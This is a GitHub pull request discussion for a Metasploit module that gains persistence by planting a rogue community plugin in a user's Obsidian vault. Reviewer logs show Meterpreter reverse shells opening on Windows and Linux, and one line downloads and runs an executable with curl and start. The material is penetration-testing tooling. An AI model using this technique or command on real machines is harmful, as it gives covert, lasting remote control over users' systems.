obsidian community plugin persistence module #19698
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
h00die
changed the title
jheysel-r7
reviewed
Dec 10, 2024
There was a problem hiding this comment.
Thanks for the module @h00die! A couple minor comments. I was able to get the module working on both Windows and Ubuntu:
msf6 exploit(multi/local/obsidian_plugin_persistence) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4747
[*] Using plugin name: heFg
[+] Found open vault a3c85fece5bc4754: /home/msfuser/Documents/Obsidian Vault
[+] Found open vault 0b89f4384029f5e5: /home/msfuser/Documents/Obsidian Vault/test
[*] Uploading plugin to vault /home/msfuser/Documents/Obsidian Vault
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Uploading plugin to vault /home/msfuser/Documents/Obsidian Vault/test
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Sending stage (3045380 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4747 -> 172.16.199.135:50644) at 2024-12-10 09:51:58 -0800
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo\
> Interrupt: use the 'exit' command to quit
meterpreter > sysinfo
Computer : 172.16.199.135
OS : Ubuntu 22.04 (Linux 6.8.0-49-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
msf6 exploit(multi/local/obsidian_plugin_persistence) > run
[*] Command to run on remote host: curl -so %TEMP%\MWepEBBdLa.exe http://172.16.199.1:8080/_tdKmkFueHIFyaHmed_EsQ & start /B %TEMP%\MWepEBBdLa.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /_tdKmkFueHIFyaHmed_EsQ
[*] Started reverse TCP handler on 172.16.199.1:9494
[*] Using plugin name: gJ3hDuF
[*] Target User: msfsuer
[*] Found user obsidian file: C:\Users\msfsuer\AppData\Roaming\obsidian\obsidian.json
[+] Found open vault 4a64d0cad62c57e8: C:\Users\msfsuer\Documents\test
[*] Uploading plugin to vault C:\Users\msfsuer\Documents\test
[*] Uploading: C:\Users\msfsuer\Documents\test/.obsidian/plugins/gJ3hDuF/main.js
[*] Uploading: C:\Users\msfsuer\Documents\test/.obsidian/plugins/gJ3hDuF/manifest.json
[*] Found 9 enabled community plugins (JjzmylLVr, U24sEX, XnIUKw3j6, WZv6jwbIB, ZopQa, UnLc0Xt, 8N639, DH9fw7, YFvM)
[*] adding gJ3hDuF to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 172.16.199.132 requested /_tdKmkFueHIFyaHmed_EsQ
[*] Sending payload to 172.16.199.132 (curl/8.0.1)
[*] Sending stage (203846 bytes) to 172.16.199.132
[*] Meterpreter session 4 opened (172.16.199.1:9494 -> 172.16.199.132:51302) at 2024-12-10 11:02:54 -0800
meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfsuer
meterpreter > sysinfo
Computer : DESKTOP-0OPTL76
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > cd
|
All changes pushed, retested on linux and working. |
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
adeherdt-r7
reviewed
Dec 12, 2024
| 'Platform' => %w[osx linux windows], | ||
| 'DefaultOptions' => { | ||
| # 25hrs, you know, just in case the user doesn't open Obsidian for a while | ||
| 'WfsDelay' => 90_000, |
There was a problem hiding this comment.
Waiting 25 hours sounds a bit excessive, perhaps make this a passive module?
There was a problem hiding this comment.
I agree, however adding 'Stance' => Msf::Exploit::Stance::Passive, doesn't make it go background. Not sure if there's a regression somewhere, or it doesn't work with Msf::Exploit::Local
There was a problem hiding this comment.
I actually ran in to this before but didn't feel like dealing with it.
adfoster-r7
reviewed
Dec 12, 2024
|
Got this tested on windows again, working! |
jheysel-r7
approved these changes
Dec 30, 2024
There was a problem hiding this comment.
Thanks for making those changes @h00die. Retested and everything is looking great 🚀
msf6 exploit(multi/local/obsidian_plugin_persistence) > run
[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Using plugin name: ohXq6CuqZp
[+] Found open vault 48e870b2c253f5f7: C:\Users\msfsuer\Documents\Test
[*] Uploading plugin to vault C:\Users\msfsuer\Documents\Test
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Sending stage (203846 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.132:50029) at 2024-12-30 08:51:29 -0800
meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfsuer
symeterpreter > sysinfo
Computer : DESKTOP-0OPTL76
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Release NotesAdds a new persistence module by making a community plugin for Obsidian, and attaching it to the user's vault. Each time the user opens the vault, the payload executes. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR adds a new persistence module by making a community plugin for Obsidian, and attaching it to the user's vault. Each time the user opens the vault, a shell executes.
I coded in OSX, but only tested against Windows and Linux.
Verification
List the steps needed to make sure this thing works
use multi/local/obsidian_plugin_persistencerun